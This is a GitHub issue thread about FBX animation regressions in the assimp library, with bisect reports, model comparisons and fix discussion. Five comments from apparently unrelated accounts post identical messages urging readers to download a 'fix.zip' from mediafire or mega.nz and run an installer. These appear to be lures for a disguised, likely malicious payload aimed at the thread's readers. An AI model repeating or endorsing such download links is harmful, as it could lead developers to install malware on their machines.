### ISSUE TITLE
[Epic] FBX animation deterioration

### ISSUE THREAD

**Issue by tellypresence** [assimp/assimp#5719]
There are a number of FBX animation related issues open currently including:
- `Bug introduced 27 Oct 2019:` #5808
- `Bug introduced 24 Mar 2020:` #3390
- #1974 
- #4487
- #4550 
- #4714
- #5131
- #5449

### Possible cause
What seems to have happened is that bug #5808 was introduced on 27 Oct 2019, which went unreported for several months.  Code continued to be added incrementally, and then bug #3390 was introduced on 24 Mar 2020; this bug also went unreported for many months and in the meantime a lot of complexity had been added to the FBX importer.

Also, it's important to understand that bugs in the FBX code don't affect all FBX models.  Some FBX models are affected by some bugs, while other FBX models are affected by other bugs; in the examples below, it can be observed that
- "Nathan" model was unaffected by the first bug
- "Sophia" and "Manuel" models were affected by both bugs*

If a developer is only testing against a small set of models, it is unfortunately likely that new code may contain bugs which don't affect the local test FBX model(s), but which may affect other FBX models...

*Manuel worked properly in release v5.3.1 while Nathan was broken (details table below), so I suspect v5.3.1 contained only the 2nd bug and not the first; for some reason "Manuel" showed artifacts due to 2nd bug on `master` branch but not in release 5.3.1

### Bisect report: bug #5808 introduced on 27 Oct 2019
Details in issue 5808 [comment](https://github.com/assimp/assimp/issues/5808#issue-2580337271)

### Bisect report: bug #3390 introduced on 24 Mar 2020
Details in issue 3390 [comment](https://github.com/assimp/assimp/issues/3390#issuecomment-2408621190)

### (N - 1)st partial fix introduced in [`88a9598`](https://github.com/assimp/assimp/commit/88a9598ded4ab8a9a8742e5143a2eb406886655e) on 26 Apr 2022
At commit [`88a9598`](https://github.com/assimp/assimp/commit/88a9598ded4ab8a9a8742e5143a2eb406886655e) on 26 Apr 2022, "Manuel" got fixed and "Sophia" became less degraded (though was still "abstract art")

### Bisect report: Nth bug introduced in 28 Nov 2023 commit [`384db86`](https://github.com/assimp/assimp/commit/384db8686e84fe95afe417fd341fc259f528649d)
"Manuel" broke again, Sophia got worse, and both "SilverDragon" and "TarislandDragon" completely broken
Details in [below comment](https://github.com/assimp/assimp/issues/5719#issuecomment-2307928439)

Anyone have any ideas on how to improve the situation?  Another case where bugs got introduced several years ago and may be hard to address with all the additional code added during that period

### Observations
To prevent these sorts of things happening in future, would be useful to have a minimal set of carefully selected test FBX models in the repo with guidelines that their animation must not be broken by any code updates (i.e. the set of models would need to be manually tested before committing modifications)

#### Difficulties correlating assimp releases with repo main branch
Due to the highly selective cherry-picking when creating assimp releases, it is often not possible to compare a release against a commit to the repo main branch even if they are around the same point in time.  An example is the table in [issue 5449](https://github.com/assimp/assimp/issues/5449#issuecomment-2023986936) where it can be seen that the "Manuel" model was still working at release 5.3.1 from 2023, despite having been broken on the main repo branch since 2019; and "Nathan," which was broken at the 24 Mar 2020 commit, was also broken in 5.3.1 -- as mentioned above, my theory (which of course may well be wrong) is that v5.3.1 only had the second bug, not the first, which would have broken all three models ("Sophia", "Nathan" and "Manuel") so it's a mystery why only "Manuel" was not broken in release 5.3.1

<table>
<tr><th rowspan=2>Model</th><th colspan=3>Assimp version</th><th rowspan=2>Notes</th></tr>
<tr><th><tt>2d2889f (24 Sep 2019)</tt></th><th><tt>release 5.3.1 (25 Sep 2023)</tt></th><th><tt>feb861f</tt> (21 Mar 2024)</th></tr>
<tr><td><tt>manuel dancing</tt><br><img src="https://github.com/assimp/assimp/assets/26958898/afe5db2a-0a54-41d8-a7c3-af47abe2ef89" alt="22-rp_manuel_animated_001_dancing_fbx" width=120></td><td><img src="https://github.com/user-attachments/assets/9caa7d45-fd1c-4a23-9c27-44414aa35318" alt="22-rp_manuel_animated_001_dancing_fbx" width=120></td><td><img src="https://github.com/assimp/assimp/assets/26958898/765bad68-600a-4a4e-9bae-c20ff5c7a1e1" alt="22-rp_manuel_animated_001_dancing_fbx_assimp_release_5_3_1" width=90></td><td><img src="https://github.com/assimp/assimp/assets/26958898/67ffcf6a-2ff0-4937-b40a-36f8b7e3f3b9" alt="22-rp_manuel_animated_001_dancing_fbx_assimp_commit_feb861f" width=120></td><td>Worked at commit <tt>2d2889f</tt> and release 5.3.1, obviously wrong now</td></tr>
<tr><td><tt>sophia idling</tt><br><img src="https://github.com/assimp/assimp/assets/26958898/1c0e7da1-0091-4485-b778-f877be5720b5" alt="35-rp_sophia_animated_003_idling_fbx" width=90></td><td><img src="https://github.com/user-attachments/assets/a8a2e350-2bee-4d07-9631-7f8b6bbe5e59" alt="22-rp_manuel_animated_001_dancing_fbx" width=90></td><td><img src="https://github.com/assimp/assimp/assets/26958898/2e1dcf9f-9a23-46a8-afd8-f4eb7fc1375b" alt="35-rp_sophia_animated_003_idling_fbx_assimp_release_5_3_1" width=90></td><td><img src="https://github.com/assimp/assimp/assets/26958898/8cf063e1-2946-40c7-bf97-174251f1157f" alt="35-rp_sophia_animated_003_idling_fbx_assimp_commit_feb861f" width=90></td><td>Worked at commit <tt>2d2889f</tt>, didn't work in release 5.3.1, obviously worse now</td></tr>
<tr><td><tt>nathan walking</tt><br><img src="https://github.com/assimp/assimp/assets/26958898/0a0813f5-4f60-4f18-b377-39bf436534bb" alt="55-rp_nathan_animated_003_walking_fbx" width=90></td><td><img src="https://github.com/user-attachments/assets/f9799162-7c26-40dc-929b-fdf478ff9334" alt="22-rp_manuel_animated_001_dancing_fbx" width=90></td><td><img src="https://github.com/assimp/assimp/assets/26958898/d2570a2e-e20c-4fb0-ba51-84dc639a67d6" alt="55-rp_nathan_animated_003_walking_fbx_release_5_3_1" width=90></td><td><img src="https://github.com/assimp/assimp/assets/26958898/5ffb8b16-f2b9-4e74-b7c2-71991e35e877" alt="55-rp_nathan_animated_003_walking_fbx_assimp_commit_feb861f" width=90></td><td>Worked at commit <tt>2d2889f</tt>, didn't work in release 5.3.1, no obvious difference now</td></tr>
</table>

_Note: (like there's not enough going on here already) Sophia at release v5.3.1 looks weird, like there was a 3rd bug introduced at some point that only affects her animation_

### Get the models
Models mentioned above are available either
- using [direct link](https://renderpeople.com/sample/free/renderpeople_free_animated_people_FBX.zip)
- from [renderpeople.com](https://renderpeople.com/free-3d-people/): under "3D Animated People" click "Free Download" button, then click the "FBX" button and download zip

Models of interest are
- `22-rp_manuel_animated_001_dancing_fbx`
- `35-rp_sophia_animated_003_idling_fbx`
- `55-rp_nathan_animated_003_walking_fbx`

**Comment by tellypresence** [comment]
(reserved)

**Comment by tellypresence** [comment]
(reserved)

**Comment by tellypresence** [comment]
(reserved)

**Comment by tellypresence** [comment]
(reserved)

**Comment by tellypresence** [comment]
(reserved)

**Comment by tellypresence** [comment]
(reserved)

**Comment by tellypresence** [comment]
(reserved)

**Comment by tellypresence** [comment]
(reserved)

**Comment by esttemanb** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by esttemanb** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by esttemanb** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by esttemanb** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by Zoraaa-z** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by GitHubDragonFly** [comment]
@tellypresence maybe try testing with the attached FBX files or possibly compiling my [updates](https://github.com/GitHubDragonFly/assimp/tree/updates) branch.

If this does work for you then take your time analyzing the FBX files, since I did restore and modified mainly `FBXConverter` files but there could be some minor changes elsewhere (maybe also rely on the GitHub system to see the differences).

This seems to be working in my [ASSIMP Viewer](https://githubdragonfly.github.io/viewers/templates/ASSIMP%20Viewer.html).

[FBX.zip](https://github.com/user-attachments/files/16826326/FBX.zip)

**Comment by Urri78m** [comment]
Hello everyone, we have indeed discovered a lot of problems with animations taken from mixamo.
![Screenshot 2024-09-05 234650](https://github.com/user-attachments/assets/1b956ac2-6a06-4a6a-8e28-c312cac2a300)

**Comment by lxw404** [comment]
@tellypresence Thank you very much for making this post, it's helping me track down these regressions.  The 28th of November regression is fixed via: https://github.com/assimp/assimp/pull/5751.  I'll be taking a look at the prior ones next week or so.

**Comment by tellypresence** [comment]
@lxw404 Thank you for that PR, can confirm it fixed two of the affected models, but "Manuel" which was also broken with the 28 Nov 2023 regression is still broken as can be seen in this [comment on issue 5449](https://github.com/assimp/assimp/issues/5449#issuecomment-2345136666)

**Comment by kimkulling** [comment]
I will add the regression tests to the FBX assets.

**Comment by kimkulling** [comment]
I guess to be able to test these regressions a model dump will be necessary. I guess doing this with your models will be a little bit too big.

**Comment by kimkulling** [comment]
And thanks you all for the great work and help figuring this out. A lot of users will love you forever I guess!

**Comment by tellypresence** [comment]
@Urri78m @lxw404
Please pull latest commit, rebuild and check if your models are still having problems -- also please post screenshots to track the issue either way
